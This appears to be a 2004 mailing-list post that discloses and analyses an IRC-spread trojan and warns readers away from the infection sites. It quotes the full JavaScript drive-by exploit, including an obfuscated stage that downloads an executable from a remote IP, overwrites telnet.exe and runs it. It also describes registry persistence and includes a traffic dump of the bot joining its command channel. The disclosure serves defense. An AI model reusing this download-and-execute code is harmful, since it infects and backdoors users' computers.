<<< Date Index >>>     <<< Thread Index >>>

New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection



It seems that a new trojan is making the rounds on irc.
Nobody else seems to have figured it out yet, as there is no antivirus
pattern out.

It seems that things on this list get attention quicker, and my virus case
hasn't even been looked at yet from any av vendor. I'd like to post what
i've found to speed the process up.

While on irc, a client posted a link to the following url.
I was on a fully patched windows xp sp1 box at the time with up to date
virus scan. (Symantec AV 2004)

I click the url, and see a picture, and a mini popup window. Thought it to
be strange, but nothing else of it at the time.

**THIS URL IS NOT SAFE** DO NOT CLICK
http:-//www.teamwwindy.com/thekiss.jpg
**THIS URL IS NOT SAFE** DO NOT CLICK


** UPDATE ***
I am seeing this spread from clients posting a new url today as well
http:-//www.rvsgroups.com/nfos/DOOM.III-DEViANCE/
** DO NOT GO TO THIS URL UNLESS YOU WANT TO BE INFECTED **

(ps links are broken with - intentionally to prevent infection)


Symantec on latest pattern detects nothing.
Trend Micro internet security detects some sort of javacript Exploit;
however in this case the payload still infected the machine using trend.

The web exploit that installs the payload runs this javascript code code
--------------snip ----------------snip-------------------snip--------------
---------------------------
function getRealShell() {
    myiframe.document.write("<SCRIPT
SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

--------------snip ----------------snip-------------------snip--------------
---------------------------
the file shellscript(1).js file is downloaded
shellscript.js is run contains this code

--------------snip ----------------snip-------------------snip--------------
---------------------------
var downloadurl="http://66.119.180.10:8080/a.exe";;

if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
savetopath="C:\\WINNT\\system32\\telnet.exe";

payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r"
+ "e" + "a" + "m"; }

var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);

location.href = "telnet://";

--------------snip ----------------snip-------------------snip--------------
---------------------------
At this point I see a process telnet.exe is in the task manager. This is the
a.exe file that was downloaded by shellscript.js moved to
c:\windows\telnet.exe or telnet.bak

(something to do with windows file protection I believe)

(note a registry key was also made to rename telnet.bak to telnet.exe on the
next boot........ giving you a version of telnet that is actually a
backdoor) (there is also a runonce reg key made to msmsgr.exe which is also
just a copy of the a.exe file that the earlier javascript exploit copied up)

Now once the payload has executed (a.exe or telnet.exe)

It connects to this irc server 66-119-180-10.van.zoolink.com:6667
Here's a sniffer dump of the first few seconds.

NICK zapvc
USER zxayd 0 0 :zapvc
:irc.server NOTICE zapvc :*** If you are having problems connecting due to
ping timeouts, please type /quote pong 81863547 or /raw pong 81863547 now.
PING :81863547
PONG 81863547
:IRC!IRC@xxxxxxxxxx PRIVMSG zapvc :VERSION
:irc.server 001 zapvc :Welcome to the Private IRC Network
zapvc!zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 002 zapvc :Your host is irc.server, running version
Unreal3.2-beta19
:irc.server 003 zapvc :This server was created Mon Jan 12 15:18:40 2004
:irc.server 004 zapvc irc.server Unreal3.2-beta19
iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzN
:irc.server 005 zapvc MAP KNOCK SAFELIST HCN MAXCHANNELS=5 MAXBANS=60
NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported
by this server
:irc.server 005 zapvc WALLCHOPS WATCH=128 SILENCE=5 MODES=12 CHANTYPES=#
PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=Private
CASEMAPPING=ascii :are supported by this server
:irc.server 251 zapvc :There are 922 users and 2 invisible on 1 servers
:irc.server 254 zapvc 5 :channels formed
:irc.server 255 zapvc :I have 924 clients and 0 servers
:irc.server 265 zapvc :Current Local Users: 924  Max: 1719
:irc.server 266 zapvc :Current Global Users: 924  Max: 926
JOIN #desk
:irc.server 422 zapvc :MOTD File is missing
USERHOST zapvc
JOIN #desk
USERHOST zapvc
JOIN #desk
USERHOST zapvc
:zapvc!zxayd@ip68-2-130-81.@mydomain.changed.com JOIN :#desk
:irc.server 332 zapvc #desk :.mirc spread stop
:irc.server 333 zapvc #desk spn 1087025036
:irc.server 353 zapvc @ #desk :zapvc @spn @_p_
:irc.server 366 zapvc #desk :End of /NAMES list.
PRIVMSG #desk :
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 412 zapvc :No text to send

If I manually join #desk
----------------------------------------------------------------------------
----------------------
You are now talking on #desk
--- Topic for #desk is .mirc spread stop
--- Topic for #desk set by spn at Sat Jun 12 00:23:56

>From the topic it looks like .mirc spread stop is a remote control command
to stop the spread. I am unsure what other commands are available to those
who are controlling the trojan.

It is hikacking the MIRC client of the person infected and using this
functionality to spread by messaging clients with the url of the website
that the infection occurs from.

As of this morning the channel #desk is unoccupied. The irc server is still
up, no public channels, and a client connection count of about 800.

I submitted samples to trend micro, and wanted to submit to symantec but
their submission process is overly complicated since I no longer had their
product installed I couldn't submit samples.

Abuse departments where the webpage resides, as well as the irc server
resides have been contacted, but no action has been taken thus far.